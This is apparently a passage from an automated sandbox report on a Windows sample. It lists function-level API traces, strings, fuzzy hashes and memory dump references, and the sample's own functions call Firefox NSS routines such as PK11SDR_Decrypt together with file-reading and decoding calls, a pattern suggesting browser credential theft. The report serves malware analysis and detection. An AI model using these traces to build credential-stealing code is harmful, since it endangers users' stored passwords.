Part of subcall function 0040BF90: PK11SDR_Decrypt.NSS3(?,?,00000000), ref: 0040C05B
Part of subcall function 0040BF90: memcpy.MSVCRT ref: 0040C082
Part of subcall function 0040BF90: PK11_FreeSlot.NSS3(?), ref: 0040C0D1

StrStrA.SHLWAPI(?,02F55888,00000000,?,0041DBBC,00000000,?,00000000,02F519F8), ref: 0040C4BD
StrStrA.SHLWAPI(00000000,02F519A8), ref: 0040C4D4

Part of subcall function 0040BF90: lstrcat.KERNEL32(?,0041D726), ref: 0040C0B3
Part of subcall function 0040BF90: lstrcat.KERNEL32(?,0041D727), ref: 0040C0C7
Part of subcall function 0040BF90: lstrcat.KERNEL32(?,0041D72A), ref: 0040C0E8

lstrlen.KERNEL32(00000000), ref: 0040C5A7
CloseHandle.KERNEL32(00000000), ref: 0040C5F9
NSS_Shutdown.NSS3 ref: 0040C607

Strings

, xrefs: 0040C133

Memory Dump Source

Source File: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5g0.jbxd

Yara matches

Similarity

API ID: Filelstrcat$lstrcpy$K11_lstrlen$PointerSlot$AuthenticateBinaryCloseCreateCryptDecryptFreeHandleInitInternalReadShutdownSizeStringmallocmemcpymemset
String ID:
API String ID: 2844179199-3916222277
Opcode ID: 7d3cdfaded0d7a04ce603acc8823451e09861ef85132449e8ac6469c750cdabf
Instruction ID: 16cc530deb27457f536659a64f134916331f5af867ee6c6bf2a367595298ef92
Opcode Fuzzy Hash: 7d3cdfaded0d7a04ce603acc8823451e09861ef85132449e8ac6469c750cdabf
Instruction Fuzzy Hash: 66E11075910208ABCB14EBA1DC91FEEBB79BF54304F41415EF10667191DF38AA86CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 6BC74AF0 Relevance: 27.4, APIs: 18, Instructions: 355memorystringthreadCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000,00000000,00000000,?,?,6BCB1444,?,?,00000000,?,?), ref: 6BC74BD4

Part of subcall function 6BCB0C90: PR_SetError.NSS3(00000000,00000000,6BCB1444,?,00000001,?,00000000,00000000,?,?,6BCB1444,?,?,00000000,?,?), ref: 6BCB0CB3

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,?,6BCB1444), ref: 6BC74B87
memcpy.VCRUNTIME140(00000000,?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6BC74BA5

Part of subcall function 6BCC88E0: TlsGetValue.KERNEL32(00000000,?,?,6BCD08AA,?), ref: 6BCC88F6
Part of subcall function 6BCC88E0: EnterCriticalSection.KERNEL32(?,?,?,?,6BCD08AA,?), ref: 6BCC890B
Part of subcall function 6BCC88E0: PR_NotifyCondVar.NSS3(?,?,?,?,?,6BCD08AA,?), ref: 6BCC8936
Part of subcall function 6BCC88E0: PR_Unlock.NSS3(?,?,?,?,?,6BCD08AA,?), ref: 6BCC8940

PR_SetError.NSS3(FFFFE02A,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6BC74DF5
PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?), ref: 6BC74B94

Part of subcall function 6BCD10C0: TlsGetValue.KERNEL32(?,6BC78802,00000000,00000008,?,6BC6EF74,00000000), ref: 6BCD10F3
Part of subcall function 6BCD10C0: EnterCriticalSection.KERNEL32(?,?,6BC78802,00000000,00000008,?,6BC6EF74,00000000), ref: 6BCD110C
Part of subcall function 6BCD10C0: PL_ArenaAllocate.NSS3(?,?,?,6BC78802,00000000,00000008,?,6BC6EF74,00000000), ref: 6BCD1141
Part of subcall function 6BCD10C0: PR_Unlock.NSS3(?,?,?,6BC78802,00000000,00000008,?,6BC6EF74,00000000), ref: 6BCD1182
Part of subcall function 6BCD10C0: TlsGetValue.KERNEL32(?,6BC78802,00000000,00000008,?,6BC6EF74,00000000), ref: 6BCD119C

free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,?,6BCB1444,?), ref: 6BC74BC2
PR_GetCurrentThread.NSS3(?,?,?,?,?,00000000,00000000), ref: 6BC74BEF
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,00000000,00000000,?,?,6BCB1444), ref: 6BC74C27
SECITEM_CompareItem_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,?,6BCB1444), ref: 6BC74C42
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6BC74D5A
PORT_ArenaAlloc_Util.NSS3(00000000,00000001), ref: 6BC74D67
memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6BC74D78
PR_SetError.NSS3(FFFFE001,00000000), ref: 6BC74DE4
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6BC74E4C
PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6BC74E5B
memcpy.VCRUNTIME140(00000000,00000000,00000001), ref: 6BC74E6C

Part of subcall function 6BC74880: PR_SetError.NSS3(FFFFE005,00000000), ref: 6BC748A2

SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6BC74EF1
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6BC74F02

Memory Dump Source

Source File: 00000001.00000002.2100857376.000000006BBF1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BBF0000, based on PE: true

Associated: 00000001.00000002.2100824423.000000006BBF0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101124895.000000006BD8F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101204782.000000006BDCE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101266174.000000006BDCF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101302236.000000006BDD0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101331765.000000006BDD5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bbf0000_u5g0.jbxd

Similarity

API ID: Util$Error$Arena$Alloc_Item_Valuememcpystrlen$CriticalEnterSectionUnlockZfree$AllocateArena_CompareCondCurrentFreeNotifyThreadfree
String ID:
API String ID: 24311736-0
Opcode ID: eb4b9db2673fcedcfade69d638e666ab3c08a4de414fdce086a20ace53df4830
Instruction ID: eec5684a86d98c1e0b07fcdece18c17299939760ffc736d10e8a0b81087beec7
Opcode Fuzzy Hash: eb4b9db2673fcedcfade69d638e666ab3c08a4de414fdce086a20ace53df4830
Instruction Fuzzy Hash: E5C13CB5E112159BEB10DFA9DC81B9F77F8AF19314F040479E815AB341F739EA048BA2

Uniqueness

Uniqueness Score: -1.00%

Function 6BC85AE0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6BC85C1E
PR_CallOnce.NSS3(6BDD2AA4,6BCD12D0), ref: 6BC85C43
PL_FreeArenaPool.NSS3(?), ref: 6BC85C5D
PORT_NewArena_Util.NSS3(00000800), ref: 6BC85C8C
SEC_QuickDERDecodeItem_Util.NSS3(00000000,?,6BD9A540,?), ref: 6BC85CAB
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6BC85CBE
PR_SetError.NSS3(FFFFE006,00000000), ref: 6BC85CCF
PL_FinishArenaPool.NSS3(?), ref: 6BC85CF2
HASH_GetHashTypeByOidTag.NSS3 ref: 6BC85D00
SECOID_FindOID_Util.NSS3(?), ref: 6BC85D16
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6BC85D30
HASH_GetHashTypeByOidTag.NSS3 ref: 6BC85D3A

Strings

security, xrefs: 6BC85C18

Memory Dump Source

Source File: 00000001.00000002.2100857376.000000006BBF1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BBF0000, based on PE: true

Associated: 00000001.00000002.2100824423.000000006BBF0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101124895.000000006BD8F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101204782.000000006BDCE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101266174.000000006BDCF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101302236.000000006BDD0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101331765.000000006BDD5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bbf0000_u5g0.jbxd

Similarity

API ID: Util$ArenaArena_FreePool$HashType$CallDecodeErrorFindFinishInitItem_OnceQuick
String ID: security
API String ID: 3817386848-3315324353
Opcode ID: a0c313b948b24bcb8024886363c2f48f62fbd5ae61f6bf6a4302730cf93e931d
Instruction ID: f433f5b13ba8563e0ff376f42cfc2089b448e856732a0f0728f0c14b1ee747d2
Opcode Fuzzy Hash: a0c313b948b24bcb8024886363c2f48f62fbd5ae61f6bf6a4302730cf93e931d
Instruction Fuzzy Hash: E35104B5C252159BEB008FA5EC81B6A7BA4BB0930DF140476EB42DA190F3BDDB14CF52

Uniqueness

Uniqueness Score: -1.00%

Function 0040FAE0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 145stringCOMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,block), ref: 0040FB05
ExitProcess.KERNEL32 ref: 0040FB11
strtok_s.MSVCRT ref: 0040FB28

Strings

block, xrefs: 0040FAF7

Memory Dump Source

Source File: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5g0.jbxd

Yara matches

Similarity

API ID: ExitProcessstrtok_s
String ID: block
API String ID: 3407564107-2199623458
Opcode ID: 65ec231eab0bee3d84ec5e548578183e7a28d79d2285af713f635c76e54153d9
Instruction ID: 7825bcbe27da9618b603611e1cfecd621835b499ad6dca7fa43ef563d7fd58f0
Opcode Fuzzy Hash: 65ec231eab0bee3d84ec5e548578183e7a28d79d2285af713f635c76e54153d9
Instruction Fuzzy Hash: 0F514074A08209EFDB20DFA1D955BAE77B5BF44305F10807AE802B76C0D778E985CB59

Uniqueness

Uniqueness Score: -1.00%

Function 6BCA7B10 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 117COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_VerifyInit), ref: 6BCA7B36
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6BCA7B64
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6BCA7B73

Part of subcall function 6BD8D930: PL_strncpyz.NSS3(?,?,?), ref: 6BD8D963

PR_LogPrint.NSS3(?,00000000), ref: 6BCA7B89
PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6BCA7BA8
PL_strncpyz.NSS3(?, hKey = 0x%x,00000050), ref: 6BCA7BD6
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6BCA7BE8
PR_LogPrint.NSS3(?,00000000), ref: 6BCA7BFE

Strings

C_VerifyInit, xrefs: 6BCA7B31
hKey = 0x%x, xrefs: 6BCA7BC0, 6BCA7BD0
hSession = 0x%x, xrefs: 6BCA7B4E, 6BCA7B5E
pMechanism = 0x%p, xrefs: 6BCA7BA3
(CK_INVALID_HANDLE), xrefs: 6BCA7B6C, 6BCA7BDE

Memory Dump Source

Source File: 00000001.00000002.2100857376.000000006BBF1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BBF0000, based on PE: true

Associated: 00000001.00000002.2100824423.000000006BBF0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101124895.000000006BD8F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101204782.000000006BDCE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101266174.000000006BDCF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101302236.000000006BDD0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101331765.000000006BDD5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bbf0000_u5g0.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hKey = 0x%x$ hSession = 0x%x$ pMechanism = 0x%p$ (CK_INVALID_HANDLE)$C_VerifyInit
API String ID: 1003633598-1245239972
Opcode ID: 68e938073f8687131a3e1847b599c6bc827df40131bdbd00e9d41aded4321c5a
Instruction ID: a354d7c2113afa0a615395bba2bb8f7160cf3ba3d6c7a353a7e39fc5ebae4687
Opcode Fuzzy Hash: 68e938073f8687131a3e1847b599c6bc827df40131bdbd00e9d41aded4321c5a
Instruction Fuzzy Hash: 46412670511111AFEB00AF64EC89F1AB764FB8636DF084026E9496F251EB3CDA08DBF1

Uniqueness

Uniqueness Score: -1.00%

Function 6BCA6AF0 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 101COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DecryptFinal), ref: 6BCA6B16
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6BCA6B44
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6BCA6B53

Part of subcall function 6BD8D930: PL_strncpyz.NSS3(?,?,?), ref: 6BD8D963

PR_LogPrint.NSS3(?,00000000), ref: 6BCA6B69
PR_LogPrint.NSS3( pLastPart = 0x%p,?), ref: 6BCA6B85
PR_LogPrint.NSS3( pulLastPartLen = 0x%p,?), ref: 6BCA6BA0
PR_LogPrint.NSS3( *pulLastPartLen = 0x%x,?), ref: 6BCA6C0A

Strings

C_DecryptFinal, xrefs: 6BCA6B11
*pulLastPartLen = 0x%x, xrefs: 6BCA6C05
pulLastPartLen = 0x%p, xrefs: 6BCA6B9B
hSession = 0x%x, xrefs: 6BCA6B2E, 6BCA6B3E
pLastPart = 0x%p, xrefs: 6BCA6B80
(CK_INVALID_HANDLE), xrefs: 6BCA6B4C

Memory Dump Source

Source File: 00000001.00000002.2100857376.000000006BBF1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BBF0000, based on PE: true

Associated: 00000001.00000002.2100824423.000000006BBF0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101124895.000000006BD8F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101204782.000000006BDCE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101266174.000000006BDCF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101302236.000000006BDD0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101331765.000000006BDD5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bbf0000_u5g0.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulLastPartLen = 0x%x$ hSession = 0x%x$ pLastPart = 0x%p$ pulLastPartLen = 0x%p$ (CK_INVALID_HANDLE)$C_DecryptFinal
API String ID: 1003633598-2565524109
Opcode ID: 377d8f9a5f9533d9a7230334491aa3add77ccf822849a3d9444b2dac20a35f4a
Instruction ID: f3d8986fe80e06d42c9292d040426adf9e67da0c0be7aca380da743d58d81229
Opcode Fuzzy Hash: 377d8f9a5f9533d9a7230334491aa3add77ccf822849a3d9444b2dac20a35f4a
Instruction Fuzzy Hash: 7C31F831511115AFEB00DFA8EC89F5AB7A5EB8636DF084075E9489F151EB3CDA08CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00411F30 Relevance: 19.7, APIs: 13, Instructions: 193stringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00411F4E
memset.MSVCRT ref: 00411F65

Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B

lstrcat.KERNEL32(?,00000000), ref: 00411F9C
lstrcat.KERNEL32(?,02F554E8), ref: 00411FBB
lstrcat.KERNEL32(?,?), ref: 00411FCF
lstrcat.KERNEL32(?,02F553F8), ref: 00411FE3

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00415490: GetFileAttributesA.KERNEL32(00000000,?,0040E9F4,?,00000000,?,00000000,0041D76E,0041D76B), ref: 0041549F

Part of subcall function 004096C0: StrStrA.SHLWAPI(00000000,02F54FA8), ref: 0040971B
Part of subcall function 004096C0: memcmp.MSVCRT ref: 00409774

Part of subcall function 004093A0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC
Part of subcall function 004093A0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004093F1
Part of subcall function 004093A0: LocalAlloc.KERNEL32(00000040,?), ref: 00409411
Part of subcall function 004093A0: ReadFile.KERNEL32(000000FF,?,00000000,'@,00000000), ref: 0040943A
Part of subcall function 004093A0: LocalFree.KERNEL32('@), ref: 00409470
Part of subcall function 004093A0: FindCloseChangeNotification.KERNEL32(000000FF), ref: 0040947A

Part of subcall function 00415AC0: GlobalAlloc.KERNEL32(00000000,00412087,00412087), ref: 00415AD3

StrStrA.SHLWAPI(?,02F566A0), ref: 0041209D
GlobalFree.KERNEL32(?), ref: 00412199

Part of subcall function 004094A0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00404BAE,00000000,00000000), ref: 004094CF
Part of subcall function 004094A0: LocalAlloc.KERNEL32(00000040,?,?,?,00404BAE,00000000,?), ref: 004094E1
Part of subcall function 004094A0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00404BAE,00000000,00000000), ref: 0040950A
Part of subcall function 004094A0: LocalFree.KERNEL32(?,?,?,?,00404BAE,00000000,?), ref: 0040951F

Part of subcall function 004097F0: memcmp.MSVCRT ref: 0040980B
Part of subcall function 004097F0: memset.MSVCRT ref: 0040983E
Part of subcall function 004097F0: LocalAlloc.KERNEL32(00000040,?), ref: 0040988E

lstrcat.KERNEL32(?,00000000), ref: 0041212A
StrCmpCA.SHLWAPI(?,0041D4AB,?,?,?,?,000003E8), ref: 00412147
lstrcat.KERNEL32(00000000,00000000), ref: 00412159
lstrcat.KERNEL32(00000000,?), ref: 0041216C
lstrcat.KERNEL32(00000000,0041D840), ref: 0041217B

Memory Dump Source

Source File: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5g0.jbxd

Yara matches

Similarity

API ID: lstrcat$Local$AllocFile$Freememset$BinaryCryptGlobalStringmemcmp$AttributesChangeCloseCreateFindFolderNotificationPathReadSizelstrcpy
String ID:
API String ID: 3662689742-0
Opcode ID: 09885d9ac525264d426f26b6d3857de28d82354b94cb099591bdfda86a94eaca
Instruction ID: d5c3215e2bd1f08faed5fb03d7604f0585b4cbbeb5c4b7daf79ee1030fe867fa
Opcode Fuzzy Hash: 09885d9ac525264d426f26b6d3857de28d82354b94cb099591bdfda86a94eaca
Instruction Fuzzy Hash: B97158B6900618BBCB24EBE0DD49FDE7779AF88304F004599F60997181EA78DB94CF94

Uniqueness

Uniqueness Score: -1.00%

Function 6BD8ABB0 Relevance: 19.7, APIs: 13, Instructions: 173COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 6BD8ABD5
_PR_MD_UNLOCK.NSS3(?), ref: 6BD8AC21

Part of subcall function 6BD370F0: LeaveCriticalSection.KERNEL32(6BD80C7B), ref: 6BD3710D

EnterCriticalSection.KERNEL32(?), ref: 6BD8AC44
_PR_MD_NOTIFY_CV.NSS3(-00000074), ref: 6BD8AC6E
_PR_MD_UNLOCK.NSS3(?), ref: 6BD8AC97
EnterCriticalSection.KERNEL32(?), ref: 6BD8ACBF
PR_NewCondVar.NSS3(?), ref: 6BD8ACDB
_PR_MD_UNLOCK.NSS3(?), ref: 6BD8AD0D
PR_SetPollableEvent.NSS3(?), ref: 6BD8AD18
EnterCriticalSection.KERNEL32(?), ref: 6BD8AD31

Part of subcall function 6BD39890: TlsGetValue.KERNEL32(?,?,?,6BD397EB), ref: 6BD3989E

_PR_MD_UNLOCK.NSS3(?), ref: 6BD8AD89
PR_SetError.NSS3(FFFFE8D5,00000000), ref: 6BD8AD98
_PR_MD_UNLOCK.NSS3(?), ref: 6BD8ADC5

Memory Dump Source

Source File: 00000001.00000002.2100857376.000000006BBF1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BBF0000, based on PE: true

Associated: 00000001.00000002.2100824423.000000006BBF0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101124895.000000006BD8F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101204782.000000006BDCE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101266174.000000006BDCF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101302236.000000006BDD0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101331765.000000006BDD5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bbf0000_u5g0.jbxd

Similarity

API ID: CriticalSection$Enter$CondErrorEventLeavePollableValue
String ID:
API String ID: 829741924-0
Opcode ID: a1b5f8979e804b1693510b248984df8e1fd6e7400e3ed6495cc813caa348bcd8
Instruction ID: e45487b8675298ab27f4ba5d201a5a64b81f38b7a31725c93efd8b036b81411d
Opcode Fuzzy Hash: a1b5f8979e804b1693510b248984df8e1fd6e7400e3ed6495cc813caa348bcd8
Instruction Fuzzy Hash: FF61AEB6800610DFC7209F24C881706BBF5AF4533AF158569D85A9F752EB39F981CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 6BCA4B80 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 107COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DestroyObject), ref: 6BCA4BA6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6BCA4BD7
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6BCA4BE9

Part of subcall function 6BD8D930: PL_strncpyz.NSS3(?,?,?), ref: 6BD8D963

PR_LogPrint.NSS3(?,00000000), ref: 6BCA4BFF
PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6BCA4C2D
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6BCA4C3F
PR_LogPrint.NSS3(?,00000000), ref: 6BCA4C55

Strings

C_DestroyObject, xrefs: 6BCA4BA1
hSession = 0x%x, xrefs: 6BCA4BC1, 6BCA4BD1
hObject = 0x%x, xrefs: 6BCA4C17, 6BCA4C27
(CK_INVALID_HANDLE), xrefs: 6BCA4BDF, 6BCA4C35

Memory Dump Source

Source File: 00000001.00000002.2100857376.000000006BBF1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BBF0000, based on PE: true

Associated: 00000001.00000002.2100824423.000000006BBF0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101124895.000000006BD8F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101204782.000000006BDCE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101266174.000000006BDCF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101302236.000000006BDD0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101331765.000000006BDD5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bbf0000_u5g0.jbxd

Similarity

API ID: L_strncpyzPrint$L_strcatn
String ID: hObject = 0x%x$ hSession = 0x%x$ (CK_INVALID_HANDLE)$C_DestroyObject
API String ID: 332880674-4243883364
Opcode ID: 6dc7c57578579316234a7ee27b99350c5469e700f727cd1c7d2e70ce1186fd5f
Instruction ID: 86a9ece2fbf649cbeb560b8c9a672975808d6de7465f05ce3aa262aacd6002a0
Opcode Fuzzy Hash: 6dc7c57578579316234a7ee27b99350c5469e700f727cd1c7d2e70ce1186fd5f
Instruction Fuzzy Hash: 71310631511115BFE700AF64DC85F2AB764AF8676DF058025E94DAF241EB3CDA08CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6BC93BD0 Relevance: 18.2, APIs: 12, Instructions: 191COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,F04D8B4E,6BC93F23,?,6BC8E4CE,?,?,?,00000001,00000000,?,?,6BC93F23,?), ref: 6BC93BEB
EnterCriticalSection.KERNEL32(?,?,?,F04D8B4E,6BC93F23,?,6BC8E4CE,?,?,?,00000001,00000000,?,?,6BC93F23,?), ref: 6BC93BFF
PL_HashTableLookup.NSS3(?,6BC93F23,?,?,F04D8B4E,6BC93F23,?,6BC8E4CE,?,?,?,00000001,00000000,?,?,6BC93F23), ref: 6BC93C0F
PR_Unlock.NSS3(?,?,?,?,?,F04D8B4E,6BC93F23,?,6BC8E4CE,?,?,?,00000001,00000000,?), ref: 6BC93C1C

Part of subcall function 6BD1DD70: TlsGetValue.KERNEL32 ref: 6BD1DD8C
Part of subcall function 6BD1DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6BD1DDB4

TlsGetValue.KERNEL32(?,?,?,?,?,?,?,F04D8B4E,6BC93F23,?,6BC8E4CE,?,?,?,00000001,00000000), ref: 6BC93C5D
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,F04D8B4E,6BC93F23,?,6BC8E4CE,?,?,?,00000001), ref: 6BC93C71
PL_HashTableLookup.NSS3(?,?,?,?,?,?,?,?,?,F04D8B4E,6BC93F23,?,6BC8E4CE), ref: 6BC93C81
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,F04D8B4E,6BC93F23,?,6BC8E4CE), ref: 6BC93C8E
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,F04D8B4E,6BC93F23), ref: 6BC93D1B
EnterCriticalSection.KERNEL32(?), ref: 6BC93D32
PL_HashTableLookup.NSS3(00000000,CCCCCCCC), ref: 6BC93D42
PR_Unlock.NSS3(00000000), ref: 6BC93D4F

Part of subcall function 6BC607A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6BBF204A), ref: 6BC607AD
Part of subcall function 6BC607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6BBF204A), ref: 6BC607CD
Part of subcall function 6BC607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6BBF204A), ref: 6BC607D6
Part of subcall function 6BC607A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6BBF204A), ref: 6BC607E4
Part of subcall function 6BC607A0: TlsSetValue.KERNEL32(00000000,?,6BBF204A), ref: 6BC60864
Part of subcall function 6BC607A0: calloc.MOZGLUE(00000001,0000002C), ref: 6BC60880
Part of subcall function 6BC607A0: TlsSetValue.KERNEL32(00000000,?,?,6BBF204A), ref: 6BC608CB
Part of subcall function 6BC607A0: TlsGetValue.KERNEL32(?,?,6BBF204A), ref: 6BC608D7
Part of subcall function 6BC607A0: TlsGetValue.KERNEL32(?,?,6BBF204A), ref: 6BC608FB

Memory Dump Source

Source File: 00000001.00000002.2100857376.000000006BBF1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BBF0000, based on PE: true

Associated: 00000001.00000002.2100824423.000000006BBF0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101124895.000000006BD8F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101204782.000000006BDCE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101266174.000000006BDCF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101302236.000000006BDD0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101331765.000000006BDD5000.00000002.00000001.01000000.00000010.sdmpDownload File

